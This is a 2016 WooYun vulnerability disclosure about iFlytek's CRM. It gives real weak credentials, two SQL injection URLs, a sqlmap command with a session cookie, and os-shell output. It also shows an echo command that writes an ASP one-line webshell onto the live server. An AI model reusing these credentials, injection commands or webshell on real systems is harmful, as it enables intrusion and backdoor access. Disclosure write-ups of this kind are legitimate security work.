当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189161

漏洞标题:科大讯飞某系统存在弱口令SQL注入导致Shell(可内网)

相关厂商:iflytek.com

漏洞作者: harbour_bin

提交时间:2016-03-25 23:59

修复时间:2016-05-12 14:05

公开时间:2016-05-12 14:05

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

源于一次科大讯飞的面试, 问有没有测试过你们家的网站, 所以我来了...
PS:这两个月一直忙于考试,今天我胡汉三终于回来了.

详细说明:

url:http://crm.iflytek.com/


#1 账户体系控制不严 (姓名格式为: 名+姓)

litao 88888888
lixin 88888888


进入系统

kd_crm.png


相关厂商

kd_crm1.png


仅证明
#2 两处SQL注入

crm.iflytek.com/china/resultchina.asp?sort1=1&D=mc&E=cpmc&F=htzt&G=xm&C=1&Submit422=+


注入参数: C

http://crm.iflytek.com/work/telhy.asp?ksjs=mc&ksjs2=1


注入参数: ksjs2
Sqlmap执行语句

D:\Python27>python sqlmap\sqlmap.py -u "crm.iflytek.com/china/resultchina.asp?sort1=1&D=mc&E=cpmc&F=htzt&G=xm&C=1*&Submit422=+" --cookie="ASPSESSIONIDSQRATDAQ=EKMFKFJCFBNPJLMPCGEAODJJ" -f -b --dbs --users


证明:

kd_SQL_1.png


DBA权限

kd_SQL_2.png


#3 进入os-shell, 执行命令, 服务器在内网, 可域渗透

whoami 
nt authority\system


ipconfig
Windows IP Configuration
Ethernet adapter 内网:
   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 172.16.75.128
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.75.254


net view /domain
Domain
-------------------------------------------------------------------------------
MYGROUP
WG
WORKGROUP
The command completed successfully.


#4 成功shell

dir d:\zbintel31.46
2014-01-21  11:45    <DIR>          .
2014-01-21  11:45    <DIR>          ..
2014-01-21  11:45                 3 1.txt
2011-06-09  21:21                 0 1.txt.bak
2011-08-17  09:35    <DIR>          alt
2014-01-21  11:31    <DIR>          aspnet_client
2011-08-17  09:31    <DIR>          back
2011-08-17  09:31    <DIR>          bank
2011-06-09  21:21             1,674 Browser.asp
2011-08-17  09:31    <DIR>          caigou
2011-08-17  09:31    <DIR>          caigouth
2011-08-17  09:31    <DIR>          call
2011-08-17  09:31    <DIR>          chance
2011-06-09  21:21               504 check.asp
2011-06-09  21:21               862 checkid.asp
2011-06-09  22:57               115 checkin.asp
2011-06-09  22:57               115 checkin2.asp
2011-08-17  09:31    <DIR>          china
2011-06-09  21:21                 2 chkamin.asp
2011-08-17  09:31    <DIR>          contract
2011-08-17  09:31    <DIR>          contractth
2011-08-18  10:01    <DIR>          Copy (2) of email
2011-08-18  10:01    <DIR>          Copy of email
2011-08-18  10:01    <DIR>          Copy of email_sor
2011-06-09  22:57               115 Copy of index2.as
2011-08-18  10:01    <DIR>          Copy of manager
2011-08-18  10:01    <DIR>          Copy of sortsms
2011-07-01  19:18           561,453 creat.asp
2011-09-07  08:54                78 css.css
2011-06-09  22:57               115 default.asp
2011-08-17  09:46    <DIR>          Dll
2011-08-17  09:43    <DIR>          Edit
2011-08-17  09:32    <DIR>          Edit1
2011-08-17  09:32    <DIR>          editor_min
2011-08-18  10:00    <DIR>          email
2011-08-17  09:32    <DIR>          email_sort
2011-08-17  09:32    <DIR>          event
2011-06-09  21:21               531 feet.htm
2011-08-17  09:32    <DIR>          help
2011-08-17  09:32    <DIR>          hl
2011-08-17  09:32    <DIR>          hr
2011-08-17  09:32    <DIR>          http
2014-01-18  15:15    <DIR>          images
2011-08-17  09:32    <DIR>          imageshelp
2011-08-17  09:33    <DIR>          in
2011-08-17  09:33    <DIR>          inc
2011-08-17  09:33    <DIR>          inchelp
2011-09-07  13:42               818 index2.asp
2011-06-09  22:57               115 index22.asp
2011-09-07  08:56               816 index222.asp
2011-06-09  22:57               115 index3.asp
2011-06-09  22:57               115 index4.asp
2011-06-09  22:57               115 index5.asp
2011-06-09  22:57               115 index6.asp
2011-09-07  09:08    <DIR>          js
2011-08-17  09:33    <DIR>          learn
2011-08-17  09:33    <DIR>          learnhd
2011-08-17  09:33    <DIR>          learnimg
2011-08-17  09:33    <DIR>          learntz
2011-08-17  09:33    <DIR>          lend
2011-08-17  09:33    <DIR>          load
2011-08-17  09:33    <DIR>          load2
2011-06-09  21:21             4,759 logo_alle.gif
2011-08-17  09:33    <DIR>          make
2011-08-17  09:41    <DIR>          manager
2011-08-17  09:33    <DIR>          Manufacture
2011-08-17  09:33    <DIR>          message
2011-08-17  09:33    <DIR>          moban
2011-08-17  09:33    <DIR>          money
2011-08-17  09:33    <DIR>          money2
2011-08-17  09:33    <DIR>          money3
2011-08-17  09:33    <DIR>          money4
2011-08-17  09:33    <DIR>          notebook
2011-08-17  09:33    <DIR>          num_sort
2011-08-17  09:33    <DIR>          ocx
2011-08-17  09:33    <DIR>          option
2011-08-17  09:33    <DIR>          out
2011-08-17  09:33    <DIR>          part
2011-08-17  09:33    <DIR>          pay
2011-08-17  09:34    <DIR>          person
2011-08-17  09:34    <DIR>          plan
2011-08-17  09:34    <DIR>          plan2
2011-08-17  09:34    <DIR>          plan3
2011-08-17  09:34    <DIR>          price
2011-08-17  09:34    <DIR>          product
2011-08-17  09:34    <DIR>          publiccla
2011-08-17  09:34    <DIR>          return
2011-08-17  09:34    <DIR>          search
2011-08-17  09:34    <DIR>          search2
2011-08-17  09:34    <DIR>          sent
2011-08-17  09:34    <DIR>          service
2011-06-09  21:21               174 set1.asp
2011-08-17  09:34    <DIR>          setjm
2011-06-09  21:21             2,413 setup.asp
2011-06-09  21:21             2,205 setup111.asp
2011-08-17  09:34    <DIR>          smtp
2011-08-17  09:34    <DIR>          sort
2011-08-17  09:34    <DIR>          sort3
2011-08-17  09:34    <DIR>          sort4
2011-08-17  09:34    <DIR>          sort5
2011-08-17  09:34    <DIR>          sortalt
2011-08-17  09:34    <DIR>          sortbank
2011-08-17  09:34    <DIR>          sortbz
2011-08-17  09:34    <DIR>          sortcp
2011-08-17  09:34    <DIR>          sortcp2
2011-08-17  09:34    <DIR>          sortimg
2011-08-17  09:34    <DIR>          sortjf
2011-08-17  09:34    <DIR>          sortjh2
2011-08-17  09:34    <DIR>          sortkc1
2011-08-17  09:34    <DIR>          sortkc2
2011-08-17  09:34    <DIR>          sortkh
2011-08-17  09:34    <DIR>          sortpower
2011-08-17  09:34    <DIR>          sortqb
2011-08-17  09:34    <DIR>          sortre1
2011-08-17  09:34    <DIR>          sortre2
2011-08-17  09:34    <DIR>          sortset
2011-08-17  09:34    <DIR>          sortsms
2011-08-17  09:34    <DIR>          sortsp
2011-08-17  09:34    <DIR>          sorttz
2011-08-17  09:34    <DIR>          sortwages
2011-08-17  09:34    <DIR>          sortwagesjj
2011-08-17  09:34    <DIR>          sortwd
2011-08-17  09:34    <DIR>          sortxm1
2011-08-17  09:34    <DIR>          sortzs
2011-08-17  09:34    <DIR>          store
2011-08-17  09:34    <DIR>          test
2011-08-17  09:34    <DIR>          test11
2011-08-17  09:35    <DIR>          tongji
2011-08-17  09:35    <DIR>          tongji3
2011-08-17  09:35    <DIR>          tongxl


写wooyun1.asp

echo “<%execute(request("value"))%>”>>d:\zbintel31.46\wooyun.asp


木马文件:
http://crm.iflytek.com/wooyun1.asp

kd_Shell.png

漏洞证明:

已证明!
PS:仅测试, 未进行非法操作!

修复方案:

1、弱口令修复;
2、SQL注入过滤;
3、数据库权限设置;
4、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-28 14:05

厂商回复:

666

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-26 10:13 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    牛逼

  2. 2016-03-26 10:30 | harbour_bin ( 普通白帽子 | Rank:569 漏洞数:68 | 好好提升自己...)

    @qhwlpg 最近在看你的关于代码审计方面的漏洞

  3. 2016-03-26 13:35 | Format_smile ( 普通白帽子 | Rank:484 漏洞数:172 | ···孰能无过,谁是谁非!)

    6666,就是这个节奏。啪啪啪,好响

  4. 2016-03-28 14:07 | 奶嘴 ( 普通白帽子 | Rank:357 漏洞数:93 | 16岁的毛孩有些厂商故意加你好友,和你聊...)

    学大牛之看我也来个科大讯飞的洞